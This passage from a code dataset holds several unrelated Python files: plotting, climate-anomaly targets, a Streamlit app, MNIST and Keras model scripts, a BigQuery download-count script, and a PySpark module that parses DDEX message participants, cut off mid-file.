decimals=2)\n lstPosLblY = vecPosLblY.tolist()\n\n # Set position of y labels:\n axsTmp.set_yticks(lstPosLblY)\n\n # Labels for y axis:\n vecLblY = np.linspace(tpleLimY[0],\n tpleLimY[1],\n num=int(tpleLimY[2]),\n endpoint=True).tolist()\n vecLblY = np.around(vecLblY, decimals=2)\n lstLblY = vecLblY.tolist()\n\n # Set axis labels:\n axsTmp.set_yticklabels(lstLblY)\n\n # Turn of ticks:\n axsTmp.tick_params(labelcolor=([0.0, 0.0, 0.0]),\n top=False,\n bottom=False,\n left=False,\n right=False)\n\n # We create invisible axes for the colour bar slightly to the right of the\n # position of the last data-axes. First, retrieve position of last\n # data-axes:\n objBbox = axsTmp.get_position()\n # We slightly adjust the x-position of the colour-bar axis, by shifting\n # them to the right:\n vecClrAxsPos = np.array([(objBbox.x0 * 7.5),\n objBbox.y0,\n objBbox.width,\n objBbox.height])\n # Create colour-bar axis:\n axsClr = fig01.add_axes(vecClrAxsPos,\n frameon=False)\n\n # Add colour bar:\n pltClrbr = fig01.colorbar(pltTmpCorr,\n ax=axsClr,\n fraction=1.0,\n shrink=1.0)\n\n # The values to be labeled on the colour bar:\n # vecClrLblsPos01 = np.arange(varMin, 0.0, 10)\n # vecClrLblsPos02 = np.arange(0.0, varMax, 100)\n vecClrLblsPos01 = np.linspace(varMin, 0.0, num=3)\n vecClrLblsPos02 = np.linspace(0.0, varMax, num=3)\n vecClrLblsPos = np.hstack((vecClrLblsPos01, vecClrLblsPos02))\n\n # The labels (strings):\n # vecClrLblsStr = map(str, vecClrLblsPos)\n vecClrLblsStr = [str(x) for x in vecClrLblsPos]\n\n # Set labels on coloubar:\n pltClrbr.set_ticks(vecClrLblsPos)\n pltClrbr.set_ticklabels(vecClrLblsStr)\n # Set font size of colour bar ticks, and remove the 'spines' on the right\n # side:\n pltClrbr.ax.tick_params(labelsize=8.0,\n tick2On=False)\n\n # Make colour-bar axis invisible:\n axsClr.axis('off')\n\n # Save figure:\n fig01.savefig(strPathOut,\n dpi=160.0,\n facecolor='w',\n edgecolor='w',\n orientation='landscape',\n bbox_inches='tight',\n pad_inches=0.2,\n transparent=False,\n frameon=None)\n\n # Close figure:\n plt.close(fig01)\n","repo_name":"ingo-m/py_depthsampling","sub_path":"py_depthsampling/project/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32948078968","text":"import numpy as np\nimport pandas as pd\nimport xarray as xr\nimport matplotlib.pyplot as plt\n\n\ndef costomize_rolling(df, var):\n indexer = pd.api.indexers.FixedForwardWindowIndexer(window_size=14)\n # compute 'forward' mean\n df[var + '_rolling'] = df[var].rolling(window=indexer, min_periods=14).mean()\n # shift to make week 3 & 4 ground truth\n df[var + '_shift'] = df[var + '_rolling'].shift(-14)\n return df\n\n\n# read raw data\ndf_tmp2m = pd.read_hdf('tmp2m_western_us_updated.h5')\ndf_tmp2m = df_tmp2m.reset_index()\ndf_tmp2m['month'] = df_tmp2m.start_date.dt.month\ndf_tmp2m['day'] = df_tmp2m.start_date.dt.day\n# read climatology\nclimo = pd.read_hdf('climo_all.h5')\nclimo = climo.drop(['tmp2m_mean_raw', 'tmp2m_std_raw'], axis=1)\n# compute anomalies\ndata = df_tmp2m.merge(climo, on=['lat', 'lon', 'month', 'day'], how='left')\ndata['anom'] = data['tmp2m'] - data['tmp2m_mean_smooth']\ndata = data.set_index(['lat', 'lon', 'start_date'])\ndf_tmp2m_all_rolling = data.groupby(['lat', 'lon']).apply(lambda df: costomize_rolling(df, 'anom'))\ndf_tmp2m_all_rolling = df_tmp2m_all_rolling.dropna()\ntruth = df_tmp2m_all_rolling['anom_shift'].to_frame()\ntruth.columns = ['target']\ntruth.to_hdf('tmp2m_western_us_anom_rmm.h5', key='data')\n","repo_name":"Sijie-umn/SSF-MIP","sub_path":"Groundtruth/create_target_variables.py","file_name":"create_target_variables.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"4654113030","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport random\nimport os\n\nfrom pages.log import log\nfrom pages.skill_dash import skill_dash\nfrom pages.boss_dash import boss_dash\nfrom utils.config import format_sel, local_css\n\n\ndef main():\n\n st.set_page_config(page_title=\"Adventurer's Log\",\n page_icon=\"static/img/73.png\")\n\n pd.options.mode.chained_assignment = None\n local_css(\"style.css\")\n\n # Register your pages\n pages = {\n \"Adventurer's Log\": log,\n \"Skilling Dashboard\": skill_dash,\n \"Bossing Dashboard\": boss_dash,\n }\n\n st.sidebar.title(\"Adventurer's Log 📔\")\n # Widget to select your page, you can choose between radio buttons or a selectbox\n page = st.sidebar.radio(\"Select your page\", tuple(pages.keys()))\n virtual = st.sidebar.checkbox(\"Enable virtual levels\")\n #page = st.sidebar.radio(\"Select your page\", tuple(pages.keys()))\n\n # username = st.sidebar.text_input(\n # \"Enter a username\", value='', max_chars=12).replace(\"-\", \" \")\n\n username = st.sidebar.text_input(\n \"Enter a username\", \"Pompelmo\")\n\n if page in [\"Skilling Dashboard\", \"Bossing Dashboard\"]:\n period = st.sidebar.selectbox('Tracking period:',\n ('day', 'week', 'month', 'year'),\n index=1, format_func=format_sel)\n\n # Display the selected page with the session state\n pages[page](username, period)\n else:\n\n group = st.sidebar.selectbox('Group by:',\n ('session', 'day'),\n index=0, format_func=format_sel)\n pages[page](username, virtual, group)\n\n st.sidebar.title(\"About\")\n st.sidebar.info(\n \"\"\"\n The source code for this web app is available on [github]\n (https://github.com/samlaws/adventurers-log), please feel free to \n comment or make a pull request.\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samlaws/adventurers-log","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26741807872","text":"# imports ---------------------------------------------------------------------#\nimport sys\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport argparse\nimport numpy as np \nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom PIL import Image\nfrom ema import EMA\nfrom datasets import MnistDataset\nfrom transforms import RandomRotation\nfrom models.modelM3 import ModelM3\nfrom models.modelM5 import ModelM5\nfrom models.modelM7 import ModelM7\n\ndef run(p_seed=0, p_kernel_size=5, p_logdir=\"temp\"):\n\n # enable GPU usage ------------------------------------------------------------#\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n if use_cuda == False:\n print(\"WARNING: CPU will be used for training.\")\n exit(0)\n\n # data loader -----------------------------------------------------------------#\n test_dataset = MnistDataset(training=False, transform=None)\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=100, shuffle=False)\n\n # model selection -------------------------------------------------------------#\n if(p_kernel_size == 3):\n model1 = ModelM3().to(device)\n elif(p_kernel_size == 5):\n model1 = ModelM5().to(device)\n elif(p_kernel_size == 7):\n model1 = ModelM7().to(device)\n\n model1.load_state_dict(torch.load(\"../logs/%s/model%03d.pth\"%(p_logdir,p_seed)))\n\n model1.eval()\n test_loss = 0\n correct = 0\n wrong_images = []\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(test_loader):\n data, target = data.to(device), target.to(device)\n output = model1(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(target.view_as(pred)).sum().item()\n wrong_images.extend(np.nonzero(~pred.eq(target.view_as(pred)).cpu().numpy())[0]+(100*batch_idx))\n\n np.savetxt(\"../logs/%s/wrong%03d.txt\"%(p_logdir,p_seed), wrong_images, fmt=\"%d\")\n #print(len(wrong_images), wrong_images)\n\nif __name__ == \"__main__\":\n p = argparse.ArgumentParser()\n p.add_argument(\"--logdir\", default=\"modelM5\")\n p.add_argument(\"--seed\", default=0, type=int)\n p.add_argument(\"--trials\", default=30, type=int)\n p.add_argument(\"--kernel_size\", default=5, type=int)\n args = p.parse_args()\n for i in range(args.trials):\n run(p_seed = args.seed + i,\n p_kernel_size = args.kernel_size,\n p_logdir = args.logdir)\n\n\n\n\n","repo_name":"ansh941/MnistSimpleCNN","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"54"} +{"seq_id":"12750523387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 12:37:09 2023\n\n@author: kristencirincione\n\"\"\"\n\nfrom util.Data_Sources import train_images, min_width, min_height\nfrom util.convert_to_grayscale import convert_to_grayscale\nimport numpy as np\nfrom training.graph_classifier.build_model import build_model\nimport tensorflow as tf\n\n\nimg_resized = [img.resize_image(min_width, min_height) for img in train_images]\nimg_gray = [convert_to_grayscale(img) for img in img_resized]\n\nplot_type_map = {'scatter':0, 'line':1, 'dot':2, 'vertical_bar':3}\nY_plot_type = [img.plot_type for img in train_images]\nY_plot_type_mapped = [plot_type_map[plot_type] for plot_type in Y_plot_type]\n\nX = np.array(img_gray)\nY = np.array(Y_plot_type_mapped)\n\nsplit = int(len(X) * 0.8)\n\nX_train, Y_train = X[:split], Y[:split]\nX_val, Y_val = X[split:], Y[split:]\n\nmodel = build_model(input_shape=(None, min_width, min_height, 1))\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nhistory = model.fit(X_train, Y_train,\n epochs=10,\n batch_size=32,\n validation_data=(X_val, Y_val)\n)\n\nmodel.save('./training/graph_classifier/models/model_4.keras')","repo_name":"dojian/MLproject","sub_path":"Final_Project/training/graph_classifier/train_graph_classifier.py","file_name":"train_graph_classifier.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15502221221","text":"#!/usr/bin/env python3\n\n'''\nDownloads data for last month's downloads.\n'''\n\nimport json\nfrom pathlib import Path\nimport sys\nfrom google.cloud import bigquery\n\n# pylint: disable=invalid-name\n\nif len(sys.argv) < 2 or \"-h\" in sys.argv or \"--help\" in sys.argv:\n print(\"Usage: {} YYYY-MM\".format(sys.argv[0]))\n sys.exit(1)\n\nmonth = sys.argv[1]\nassert month\n\nroot_dir = Path(__file__, '..', '..').resolve()\n\nclient = bigquery.Client.from_service_account_json(Path.home() / '.bigquery' / 'keys' / 'bork-statistics.json')\n\nquery = Path(root_dir, 'queries', 'downloads-specific-month.sql').resolve().read_text()\nquery = query.replace('YYYY-MM', month)\n\nquery_job = client.query(query)\n\nresults = [{'version': row['version'], 'count': row['count']} for row in query_job]\nresults_json = json.dumps(results, indent=2)\n\nstart_date = next(iter(query_job))['start_date'].strftime('%Y-%m-%d')\nPath(root_dir, 'data', 'pypi', start_date + '.json').write_text(results_json)\n","repo_name":"duckinator/bork-statistics","sub_path":"bin/specific-month.py","file_name":"specific-month.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41571942031","text":"from pyspark.sql import DataFrame, SparkSession\nimport pyspark.sql.functions as f\nimport pyspark.sql.types as t\nimport typing as tp\n\n\nclass _TemplateRawParticipant:\n from ...schemas.proprietary_id import ProprietaryId as ProprietaryIdSchema\n from ...schemas.party_id import PartyId as PartyIdSchema\n from ...schemas.party_name import PartyName as PartyNameSchema\n from ...schemas.label_name import LabelName as LabelNameSchema\n from ...schemas.musical_work_contributor_role import MusicalWorkContributorRole as MusicalWorkContributorRoleSchema\n from ...schemas.artist_role import ArtistRole as ArtistRoleSchema\n from ...schemas.resource_contributor_role import ResourceContributorRole as ResourceContributorRoleSchema\n from ...enums import AttributeEnum, CustomFieldEnum\n\n source_schema = t.StructType([\n t.StructField(CustomFieldEnum.MessageRange.value, t.StringType(), False),\n t.StructField(CustomFieldEnum.TenantName.value, t.StringType(), False),\n t.StructField(\"ResourceReference\", t.StringType(), True),\n t.StructField(\"ProprietaryId\", ProprietaryIdSchema, True),\n t.StructField(\"PartyId\", PartyIdSchema, True),\n t.StructField(\"PartyName\", PartyNameSchema, True),\n t.StructField(\"LabelName\", LabelNameSchema, True),\n t.StructField(\"Nationality\", t.ArrayType(t.StringType(), True), True),\n t.StructField(\"IndirectResourceContributorRole\", MusicalWorkContributorRoleSchema, True),\n t.StructField(\"ArtistRole\", ArtistRoleSchema, True),\n t.StructField(\"ResourceContributorRole\", ResourceContributorRoleSchema, True),\n t.StructField(AttributeEnum.SequenceNumber.value, t.IntegerType(), True)\n ])\n\n target_schema = t.StructType([\n t.StructField(CustomFieldEnum.MessageRange.value, t.StringType(), False),\n t.StructField(CustomFieldEnum.TenantName.value, t.StringType(), False),\n t.StructField(\"ResourceReference\", t.StringType(), True),\n t.StructField(\"IsDPID\", t.BooleanType(), True),\n t.StructField(\"DPID\", t.StringType(), True),\n t.StructField(\"IsISNI\", t.BooleanType(), True),\n t.StructField(\"ISNI\", t.StringType(), True),\n t.StructField(\"AbbreviatedName\", t.StringType(), True),\n t.StructField(\"FullName\", t.StringType(), False),\n t.StructField(\"FullNameAsciiTranscribed\", t.StringType(), True),\n t.StructField(\"FullNameIndexed\", t.StringType(), True),\n t.StructField(\"KeyName\", t.StringType(), True),\n t.StructField(\"NamesAfterKeyName\", t.StringType(), True),\n t.StructField(\"NamesBeforeKeyName\", t.StringType(), True),\n t.StructField(\"LabelName\", t.StringType(), True),\n t.StructField(\"CompanyName\", t.StringType(), True),\n t.StructField(\"CompanyAddress\", t.StringType(), True),\n t.StructField(\"Nationality\", t.ArrayType(t.StringType(), True), True),\n t.StructField(\"Role\", t.StringType(), False),\n t.StructField(\"SequenceNumber\", t.IntegerType(), True),\n t.StructField(\"ProprietaryDPID\", t.StringType(), True),\n t.StructField(\"ProprietaryCode\", t.StringType(), True),\n t.StructField(f\"ProprietaryViId\", t.StringType(), True),\n t.StructField(\"ProprietaryCompanyName\", t.StringType(), True),\n t.StructField(\"ProprietaryCompanyAddress\", t.StringType(), True),\n t.StructField(\"Type\", t.StringType(), False)\n ])\n\n def __init__(\n self,\n tenant_path: str,\n fields_to_preprocess: tp.List[str],\n valid_source_fields: tp.List[str],\n participant_type: str,\n is_main_release: bool = False,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n relative_source_path: tp.Optional[str] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import CustomFieldEnum\n\n if CustomFieldEnum.MessageRange.value not in fields_to_preprocess:\n fields_to_preprocess.append(CustomFieldEnum.MessageRange.value)\n\n if CustomFieldEnum.TenantName.value not in fields_to_preprocess:\n fields_to_preprocess.append(CustomFieldEnum.TenantName.value)\n\n if CustomFieldEnum.MessageRange.value not in valid_source_fields:\n valid_source_fields.append(CustomFieldEnum.MessageRange.value)\n\n if CustomFieldEnum.TenantName.value not in valid_source_fields:\n valid_source_fields.append(CustomFieldEnum.TenantName.value)\n\n for field_name in valid_source_fields:\n if field_name not in self.source_schema.fieldNames():\n raise ValueError(\n \"Valid Source Fields Error: At least one source field is not included at source schema.\"\n )\n\n if (config is None) and (config_file is None):\n raise ValueError(\"Config Error: At least config or config_file input arguments must be specified.\")\n\n if (specification_file is None) and (input_file is None):\n raise ValueError(\"File Error: At least specification_file or input_file input arguments must be specified.\")\n\n self._spark: SparkSession = spark if spark else SparkSession.getActiveSession()\n self._tenant_path: str = tenant_path\n self._relative_source_path: str = relative_source_path\n self._specification_file: tp.Optional[str] = specification_file\n self._input_file: tp.Optional[tp.Union[str, tp.List[str]]] = input_file\n self._is_main_release: bool = is_main_release\n self._config: tp.Optional[tp.Dict[str, tp.Any]] = config\n self._config_file: tp.Optional[str] = config_file\n self._source_df: tp.Optional[DataFrame] = None\n self._fields_to_preprocess: tp.List[str] = fields_to_preprocess\n self._valid_source_fields: tp.List[str] = valid_source_fields\n self._participant_type: str = participant_type\n self._target_df: tp.Optional[DataFrame] = None\n\n @property\n def relative_source_path(self) -> str:\n return self._relative_source_path\n\n @relative_source_path.setter\n def relative_source_path(self, path: str) -> tp.NoReturn:\n self._relative_source_path = path\n\n @property\n def specification_file(self) -> tp.Optional[str]:\n return self._specification_file\n\n @property\n def input_file(self) -> tp.Optional[tp.List[str]]:\n if isinstance(self._input_file, str):\n return [self._input_file]\n else:\n return self._input_file\n\n @property\n def source_df(self) -> DataFrame:\n return self._source_df\n\n @source_df.setter\n def source_df(self, source_df: tp.Optional[DataFrame] = None) -> tp.NoReturn:\n from dependencies.utils import get_table_path\n from ...functions import filter_release_by_type, filter_by_release, filter_by_input_file\n from ...enums import CustomFieldEnum\n\n if not source_df:\n path = get_table_path(\n self._tenant_path, self.relative_source_path,\n partition_name=CustomFieldEnum.SpecificationFileName.value, partition_value=self.specification_file\n )\n print(f\"Reading source data from {path}.\")\n source_df = self._spark.read.parquet(path)\n\n if self.specification_file is None and self.input_file is not None:\n source_df = filter_by_input_file(source_df, self.input_file, spark=self._spark)\n\n source_df = filter_release_by_type(\n resource=source_df,\n release_type_flag=\"IsSoundRecordingType\",\n config=self._config,\n config_file=self._config_file\n )\n source_df = filter_by_release(df=source_df, main=self._is_main_release)\n\n self._source_df = source_df\n\n @property\n def target_df(self) -> DataFrame:\n return self._target_df\n\n def _preprocess(self) -> tp.NoReturn:\n from ...enums import AttributeEnum\n\n if self.source_df:\n field_error_count = 0\n for field_name in self._fields_to_preprocess:\n field_parts = field_name.split(\".\")\n if 1 <= len(field_parts) < 3:\n if (len(field_parts) == 1) or (\"*\" in field_name):\n assert field_parts[0] in self.source_df.schema.fieldNames()\n else:\n field_error_count += 1\n else:\n field_error_count += 1\n\n if field_error_count:\n raise ValueError(\"Field Names Error: At least one field name could not be parsed.\")\n else:\n print(f\"Start pre-processing of {self._participant_type}.\")\n source_df = self._source_df.select(*self._fields_to_preprocess)\n for field_name in self.source_schema.fieldNames():\n if field_name not in source_df.schema.fieldNames():\n source_df = source_df.withColumn(\n field_name,\n (f.lit(0) if field_name == AttributeEnum.SequenceNumber.value else f.lit(None))\n .astype(self.source_schema[field_name].dataType)\n )\n else:\n if field_name in self._valid_source_fields:\n if field_name != \"Nationality\" \\\n and isinstance(source_df.schema[field_name].dataType, t.ArrayType):\n mapping = f.explode_outer(field_name)\n else:\n mapping = f.col(field_name).astype(self.source_schema[field_name].dataType)\n else:\n mapping = f.lit(None).astype(self.source_schema[field_name].dataType)\n\n source_df = source_df.withColumn(field_name, mapping)\n\n self._source_df = source_df.select(*self.source_schema.fieldNames())\n else:\n raise ValueError(\"Source DataFrame Error: source_df must be first loaded.\")\n\n def _process(self) -> tp.NoReturn:\n from dependencies.readers.lookup import LookUpDpidList\n from ...functions.column_utils import \\\n is_dpid_mapping, dpid_mapping, \\\n is_isni_mapping, isni_mapping, \\\n value_mapping, user_defined_value_mapping\n from ...schemas.party_name import PartyName as PartyNameSchema\n from ...enums import AttributeEnum, RawParticipantEnum\n\n print(f\"Start processing of {self._participant_type}.\")\n target_df = self.source_df\n\n null_role_condition = (\n (f.col(\"IndirectResourceContributorRole\").isNull())\n & (f.col(\"ResourceContributorRole\").isNull())\n & (f.col(\"ArtistRole\").isNull())\n )\n\n # noinspection PyProtectedMember\n target_df = target_df \\\n .withColumn(\n \"IsDPID\",\n f.coalesce(\n is_dpid_mapping(\"PartyId\", mapped_from_field=True),\n f.when(\n f.col(\"PartyId\").isNotNull(), is_dpid_mapping(\"PartyId\", mapped_from_field=False)\n ).otherwise(\n f.when(null_role_condition, is_dpid_mapping(\"ProprietaryId\", mapped_from_field=False))\n )\n )\n ) \\\n .withColumn(\n \"DPID\",\n f.when(\n f.col(\"PartyId\").isNotNull(), dpid_mapping(\"PartyId\", from_namespace=False)\n ).otherwise(\n f.when(null_role_condition, dpid_mapping(\"ProprietaryId\", from_namespace=False))\n )\n ) \\\n .withColumn(\n \"IsISNI\",\n f.coalesce(\n is_isni_mapping(\"PartyId\", mapped_from_field=True),\n f.when(\n f.col(\"PartyId\").isNotNull(), is_isni_mapping(\"PartyId\", mapped_from_field=False)\n ).otherwise(\n f.when(null_role_condition, is_isni_mapping(\"ProprietaryId\", mapped_from_field=False))\n )\n )\n ) \\\n .withColumn(\n \"ISNI\",\n f.when(\n f.col(\"PartyId\").isNotNull(), isni_mapping(\"PartyId\")\n ).otherwise(\n f.when(null_role_condition, isni_mapping(\"ProprietaryId\"))\n )\n )\n\n for field in PartyNameSchema.fields:\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\n field.name,\n f.col(f\"PartyName.{field.name}\") if isinstance(field.dataType, t.StringType)\n else f.col(f\"PartyName.{field.name}\")._VALUE\n )\n target_df = target_df.drop(f.col(AttributeEnum.LanguageAndScriptCode.value))\n\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\"LabelName\", user_defined_value_mapping(\"LabelName\"))\n\n target_df = target_df.withColumn(\"Nationality\", f.coalesce(f.col(\"Nationality\"), f.array()))\n\n dpid_list = LookUpDpidList(spark=self._spark, config=self._config, config_file=self._config_file)\n dpid_list = dpid_list.drop(f.col(AttributeEnum.SequenceNumber.value))\n\n target_df = target_df.join(dpid_list, on=[\"DPID\"], how=\"left\") \\\n .withColumnRenamed(\"Address\", \"CompanyAddress\")\n\n # noinspection PyProtectedMember\n target_df = target_df.withColumn(\n \"Role\",\n f.when(\n f.col(\"IndirectResourceContributorRole\").isNotNull(),\n user_defined_value_mapping(\"IndirectResourceContributorRole\")\n ).otherwise(\n f.when(\n f.col(\"ArtistRole\").isNotNull(), user_defined_value_mapping(\"ArtistRole\")\n ).otherwise(\n f.when(\n f.col(\"ResourceContributorRole\").isNotNull(),\n user_defined_value_mapping(\"ResourceContributorRole\")\n ).otherwise(\n f.lit(self._participant_type)\n if not self._participant_type.endswith(\"Label\") else f.lit(\"Label\")\n )\n )\n )\n )\n\n roles_included = any(fieldname.endswith(\"Role\") for fieldname in self._valid_source_fields)\n sent_on_behalf_of_included = any(\n fieldname.startswith(RawParticipantEnum.SentOnBehalfOf.value) for fieldname in self._fields_to_preprocess\n )\n proprietary_id_included = \"ProprietaryId\" in self._valid_source_fields\n role_flag = (roles_included or sent_on_behalf_of_included) and proprietary_id_included\n if role_flag:\n # noinspection PyProtectedMember\n target_df = target_df \\\n .withColumn(\"ProprietaryDPID\", dpid_mapping(\"ProprietaryId\", from_namespace=True)) \\\n .withColumn(\"ProprietaryCode\", isni_mapping(\"ProprietaryId\")) \\\n .withColumn(\n f\"ProprietaryViId\",\n f.when(\n (~is_dpid_mapping(\"ProprietaryId\", mapped_from_field=False))\n & (~is_isni_mapping(\"ProprietaryId\", mapped_from_field=False)),\n value_mapping(\"ProprietaryId\")\n )\n )\n\n dpid_list = dpid_list \\\n .withColumnRenamed(\"DPID\", \"ProprietaryDPID\") \\\n .withColumnRenamed(\"CompanyName\", \"ProprietaryCompanyName\") \\\n .withColumnRenamed(\"Address\", \"ProprietaryCompanyAddress\")\n\n target_df = target_df.join(dpid_list, on=[\"ProprietaryDPID\"], how=\"left\")\n else:\n target_df = target_df \\\n .withColumn(\"ProprietaryDPID\", f.lit(None)) \\\n .withColumn(\"ProprietaryCode\", f.lit(None)) \\\n .withColumn(f\"ProprietaryViId\", f.lit(None)) \\\n .withColumn(\"ProprietaryCompanyName\", f.lit(None)) \\\n .withColumn(\"ProprietaryCompanyAddress\", f.lit(None))\n\n self._target_df = target_df\n\n def _postprocess(self) -> tp.NoReturn:\n if self.target_df:\n print(f\"Starting post-processing of {self._participant_type}.\")\n target_df = self.target_df\n for field_name in self.target_schema.fieldNames():\n if field_name not in self.target_df.schema.fieldNames():\n if field_name == \"Type\":\n target_df = target_df.withColumn(\n field_name,\n f.lit(self._participant_type).astype(self.target_schema[field_name].dataType)\n )\n elif field_name == \"SequenceNumber\":\n target_df = target_df.withColumnRenamed(f\"_{field_name}\", field_name)\n else:\n target_df = target_df.withColumn(\n field_name,\n f.lit(None).astype(self.target_schema[field_name].dataType)\n )\n else:\n continue\n target_df = target_df.na.fill({\"SequenceNumber\": 0})\n\n target_df = target_df.select(*self.target_schema.fieldNames())\n\n self._target_df = target_df\n else:\n raise ValueError(\"Target DataFrame Error: target_df must be first processed.\")\n\n def persist(self, source_df: tp.Optional[DataFrame] = None):\n self.source_df = source_df\n self._preprocess()\n self._process()\n self._postprocess()\n\n def unpersist(self) -> tp.NoReturn:\n self.source_df.unpersist()\n self.target_df.unpersist()\n\n\nclass _MessagingParty(_TemplateRawParticipant):\n def __init__(\n self,\n messaging_party_tag: str,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_RELEASES\n\n self.messaging_party_tag = messaging_party_tag\n super(_MessagingParty, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=[f\"{self.messaging_party_tag}.*\"],\n valid_source_fields=[\"PartyId\", \"PartyName\"],\n participant_type=self.messaging_party_tag,\n is_main_release=True,\n spark=spark,\n relative_source_path=MESSAGE_RELEASES,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.message_header import MessageHeader\n\n if isinstance(MessageHeader[self.messaging_party_tag].dataType, t.ArrayType):\n self._source_df = self._source_df \\\n .withColumn(self.messaging_party_tag, f.explode_outer(f.col(self.messaging_party_tag)))\n\n super(_MessagingParty, self)._preprocess()\n\n\nclass _MessageRecipient(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n super(_MessageRecipient, self).__init__(\n messaging_party_tag=MessageHeaderEnum.MessageRecipient.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _MessageSender(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n super(_MessageSender, self).__init__(\n messaging_party_tag=MessageHeaderEnum.MessageSender.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SentOnBehalfOf(_MessagingParty):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import MessageHeaderEnum\n\n super(_SentOnBehalfOf, self).__init__(\n messaging_party_tag=MessageHeaderEnum.SentOnBehalfOf.value,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n from ...schemas.proprietary_id import ProprietaryId\n from ...schemas.party_id import PartyId\n from ...enums import AttributeEnum\n\n super(_MessagingParty, self)._preprocess()\n\n # noinspection PyProtectedMember\n self._source_df = self._source_df \\\n .withColumn(\n \"ProprietaryId\",\n f.struct(\n f.col(\"PartyId\")._Namespace\n .astype(ProprietaryId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.col(\"PartyId\")._VALUE\n .astype(ProprietaryId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value)\n )\n ) \\\n .withColumn(\n \"PartyId\",\n f.struct(\n f.lit(None)\n .astype(PartyId[AttributeEnum.IsDPID.value].dataType)\n .alias(AttributeEnum.IsDPID.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.IsISNI.value].dataType)\n .alias(AttributeEnum.IsISNI.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Namespace.value].dataType)\n .alias(AttributeEnum.Namespace.value),\n f.lit(None)\n .astype(PartyId[AttributeEnum.Value.value].dataType)\n .alias(AttributeEnum.Value.value)\n )\n )\n\n self._valid_source_fields.append(\"ProprietaryId\")\n\n\nclass _SentOnBehalfOfProprietary(_TemplateRawParticipant):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_RELEASES\n from ...enums import MessageHeaderEnum\n\n super(_SentOnBehalfOfProprietary, self).__init__(\n tenant_path=tenant_path,\n 